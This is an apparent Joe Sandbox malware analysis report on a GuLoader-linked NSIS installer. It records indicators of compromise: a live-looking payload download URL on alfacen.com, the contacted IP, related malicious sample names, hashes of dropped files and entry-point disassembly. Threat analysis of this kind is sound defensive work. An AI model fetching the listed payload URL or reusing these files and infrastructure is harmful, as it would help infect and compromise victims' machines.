          http://www.ftp.ftp://ftp.gopher.450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            		unknown
            https://alfacen.com/GZgWeuQ77.binf450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                		unknown
                https://alfacen.com/GZgWeuQ77.bine450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorError450707124374000811.exefalse
                  • URL Reputation: safe
                  		unknown
                  https://alfacen.com/450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://alfacen.com/GZgWeuQ77.bine/Q450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        193.107.36.30
                        		alfacen.comBulgaria
                        		201200SUPERHOSTING_ASBGfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1538185
                        Start date and time:2024-10-20 19:07:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 43s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:450707124374000811.exe
                        Detection:MAL
                        Classification:mal80.troj.evad.winEXE@2/8@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 195
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: 450707124374000811.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        13:09:59API Interceptor3x Sleep call for process: 450707124374000811.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        193.107.36.303507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                          3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                            Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                              Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    alfacen.com3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SUPERHOSTING_ASBG3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Atlanta Office Interiors #024-010.pdfGet hashmaliciousUnknownBrowse
                                    • 185.45.66.155
                                    https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbAGet hashmaliciousUnknownBrowse
                                    • 185.45.66.155
                                    Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).htmlGet hashmaliciousUnknownBrowse
                                    • 193.107.36.200
                                    is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                                    • 185.45.67.220

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e193507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                    • 193.107.36.30
                                    3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                    • 193.107.36.30
                                    aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                    • 193.107.36.30
                                    Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                    • 193.107.36.30
                                    JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                    • 193.107.36.30
                                    SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                                    • 193.107.36.30
                                    yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                    • 193.107.36.30
                                    EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                                    • 193.107.36.30
                                    y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                    • 193.107.36.30

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                      3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                        Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                            RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                              Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousGuLoaderBrowse
                                                  Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousGuLoaderBrowse
                                                      Benefit_Signature_Plan#3762.com.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.659026618805001
                                                        Encrypted:false
                                                        SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                                        MD5:9625D5B1754BC4FF29281D415D27A0FD
                                                        SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                                        SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                                        SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                        • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                        • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                        • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                        • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious, Browse
                                                        • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                        • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                        • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                        • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                        • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Canton.Chr

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):283894
                                                        Entropy (8bit):7.702006100164842
                                                        Encrypted:false
                                                        SSDEEP:6144:vhdVvrRbGmvDU6wCxZkgdpQWENGHJCLJqjFaX6ql6ytdwD:vtvrRbGmvrwcZkg8zcHJCLkmt2D
                                                        MD5:D60DE2837DB415CC4F66B85247B99A5B
                                                        SHA1:7C46A763764028D65B812909021A647305772AB0
                                                        SHA-256:3105B5A8590A4AEE190FFAAF4C84D09B123F08DD1B6F34677BBF1BB69AECC716
                                                        SHA-512:36C9CA47DC9E55AC81CB242E7848C91913B3737579F52A39570CF1247770517BAF003812F01999A2B45CC9193FAA85910EBE9B0D1C3E960AC3E1A24D84366101
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.........F.o.%%%...--....................PPPP............./.;;;;;........ppp.....QQ.....55......MMMMM....................k..............SS.00...............................dddd...777..y......V..............p....N..OO.......GGG.....u...G.*........z.L......UUUU..OO........::.--............777....O....................0.++++.H...............".%......................$..........///...k..5...NN....[[.((.4...V...L................**........v...............jj......o............1........................I........../...................[[[[[[........((.4..............\......................YY.%..qq........V......................A.....................666..................//..........................1.........t.w.H......zzz..4444.a..k........#####.ff...........M..............|..........................&&&&.&................cccc....^^..1111..'.YY....zzzz........((.I........GG....................!!!!..mmmmm..C...................................................a....88..........UU....7............@@......

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Grundfladernes.Qua

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):82981
                                                        Entropy (8bit):4.614849518351854
                                                        Encrypted:false
                                                        SSDEEP:1536:HD0Zl31ONi8ZXxYo6qRyCkWuE78I23R0HEpJQ3Tv:HD0ObxxhcCkxg4QDv
                                                        MD5:12629C74AA6BCA8746FD8DB17EE09A8F
                                                        SHA1:A0EECC9D844403FE34CB19B19AB2CE32202B77F3
                                                        SHA-256:209451B54F4D28E90AE8D1B6A073C1234236CCEE38870399027001F5E9E38908
                                                        SHA-512:930C34FA9C781A8D4EFBB7DAAC625C1AFBB0BECDEC93DF745D0C8F17CB2FEFCA034539668A361AF4F0AA482271C3BD746B18C8BFEC17EFCD2666C8C5187722A7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:....{{..J.....P..::...................:...CC.1.....OO....}}.++.........III..n...h..........8.-......................,....MMMM.;.:::......}}....<....................SSSS....7..........##....5......^^^.....3....bb................VV........N.}}}...........J........22.v.................kk.....(((((((((((.............e.YYY..............o.....................B.llll...........#....Q.9.000.......]]]......F..........AAAA.g.YY........NNN..........WWW..................%%...............TTT...........A.......i.Y.zzzz....$...........%............t...........x.........a....k........mmmm..u...c....................`.....................gg............'''.......m.ii.........LL.NN.A.............o..........#.. ...###..........!...h..}............^..>......HHHHH...LLL...........}}............................jj...?........%%%%.............c...uu...............>...+....,,...R...d.......???..............f......DD.....................9.........$........O................. .....S......zz.........qq........x..XXX.

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\img-1.jpg

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                                        Category:dropped
                                                        Size (bytes):167813
                                                        Entropy (8bit):7.749904770387752
                                                        Encrypted:false
                                                        SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                                        MD5:8C0739994C90303B65A05C6909A53B62
                                                        SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                                        SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                                        SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\nannie.tek

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):329924
                                                        Entropy (8bit):4.933260234424776
                                                        Encrypted:false
                                                        SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                                        MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                                        SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                                        SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                                        SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\nonpendency.age

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):48084
                                                        Entropy (8bit):4.914629993393861
                                                        Encrypted:false
                                                        SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                                        MD5:511E6E568EBCF13D5098054630C627AA
                                                        SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                                        SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                                        SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\rimsmeds.txt

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):501
                                                        Entropy (8bit):4.284126845947256
                                                        Encrypted:false
                                                        SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                                        MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                                        SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                                        SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                                        SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                                        Malicious:false
                                                        Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,

                                                        C:\Users\user\AppData\Roaming\pechay\transskribere\jon\skreddene.spo

                                                        Download File
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):54488
                                                        Entropy (8bit):4.944297757860882
                                                        Encrypted:false
                                                        SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                                        MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                                        SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                                        SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                                        SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                                        Malicious:false
                                                        Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.7511646883690775
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:450707124374000811.exe
                                                        File size:1'001'467 bytes
                                                        MD5:22aeab62009aaa9073b3159d7da1195e
                                                        SHA1:602dd47b6910a522be90fc47d10d5c26a836a01a
                                                        SHA256:1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
                                                        SHA512:057f99c072baf1b2c4aadbf5851ac90288af03d991a2b2732d2d9e3c6856a62cbb3c44416e6fb6f67e193a6e50c79d0afb8f5d61f5d9a39e903f9179850b8286
                                                        SSDEEP:24576:8HANkRMLHpVBNAVC+qTC0otgAhHYGDL4kJiMv:8HANkRMLHf3OC+qTfPGD0aJ
                                                        TLSH:DD251205E3A06467C3F5CBF807A6925B7A3BDC79E641074B0352B76A2A78741F14E3AC
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........

                                                        File Icon

                                                        Icon Hash:c4bcaaec6ceeda31

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403373
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080A8h]
                                                        call dword ptr [004080A4h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [00434EECh], eax
                                                        je 00007F8701347433h
                                                        push ebx
                                                        call 00007F870134A6C9h
                                                        cmp eax, ebx
                                                        je 00007F8701347429h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F870134A643h
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F870134740Ch
                                                        push 0000000Ah
                                                        call 00007F870134A69Ch
                                                        push 00000008h
                                                        call 00007F870134A695h
                                                        push 00000006h
                                                        mov dword ptr [00434EE4h], eax
                                                        call 00007F870134A689h
                                                        cmp eax, ebx
                                                        je 00007F8701347431h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F8701347429h
                                                        or byte ptr [00434EEFh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [00434FB8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 0042B208h
                                                        call dword ptr [00408188h]
                                                        push 0040A2C8h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x34908.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x65ef0x6600a7ac317f30d043d93d4c5978f973de39False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x2aff80x600d113e76cc1b8c0774c4702688d79d792False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x350000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
